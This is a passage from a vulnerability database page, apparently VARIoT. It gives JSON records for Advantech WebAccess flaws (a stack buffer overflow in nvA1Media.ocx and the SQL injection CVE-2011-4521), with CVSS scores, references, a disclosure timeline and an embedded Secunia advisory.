"date": "2024-11-21T04:14:25.803000", "db": "NVD", "id": "CVE-2018-8841", "ident": null } ] }, "threat_type": { "_id": null, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-442" } ], "trust": 0.6 }, "title": { "_id": null, "data": "plural Advantech WebAccess Vulnerabilities related to authorization, authority, and access control in products", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005076" } ], "trust": 0.8 }, "type": { "_id": null, "data": "permissions and access control issues", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-442" } ], "trust": 0.6 } }
var-201708-1695
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-548", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-548", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4107", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-548", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ] }, "id": "VAR-201708-1695", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:03.837000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-548", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-548", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-548", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaUsername Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-548" } ], "trust": 0.7 } }
var-201202-0035
Vulnerability from variot
SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via crafted string input. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0035", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "CNNVD", "id": "CNNVD-201202-401" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001545" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4521", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2011-4521", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1a971d7c-2354-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-52466", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4521", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2011-4521", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-401", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-52466", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2011-4521", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52466" }, { "db": "VULMON", "id": "CVE-2011-4521" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "CNNVD", "id": "CNNVD-201202-401" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via crafted string input. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4521" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52466" }, { "db": "VULMON", "id": "CVE-2011-4521" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4521", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.4 }, { "db": "BID", "id": "52051", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201202-401", "trust": 0.9 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0656", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001545", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A971D7C-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52466", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2011-4521", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "VULHUB", "id": "VHN-52466" }, { "db": "VULMON", "id": "CVE-2011-4521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-401" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "id": "VAR-201202-0035", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "VULHUB", "id": "VHN-52466" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0656" } ] }, "last_update_date": "2024-11-23T21:46:31.109000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2012-0656)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10132" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52466" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4521" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4521" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/89.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-12-047-01a" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "VULHUB", "id": "VHN-52466" }, { "db": "VULMON", "id": "CVE-2011-4521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-401" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0656" }, { "db": "VULHUB", "id": "VHN-52466" }, { "db": "VULMON", "id": "CVE-2011-4521" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-401" }, { "db": "NVD", "id": "CVE-2011-4521" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0656" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52466" }, { "date": "2012-02-21T00:00:00", "db": "VULMON", "id": "CVE-2011-4521" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-401" }, { "date": "2012-02-21T13:31:55.907000", "db": "NVD", "id": "CVE-2011-4521" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0656" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52466" }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2011-4521" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001545" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-401" }, { "date": "2024-11-21T01:32:28.370000", "db": "NVD", "id": "CVE-2011-4521" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-401" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001545" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "1a971d7c-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-401" } ], "trust": 0.8 } }
var-201601-0036
Vulnerability from variot
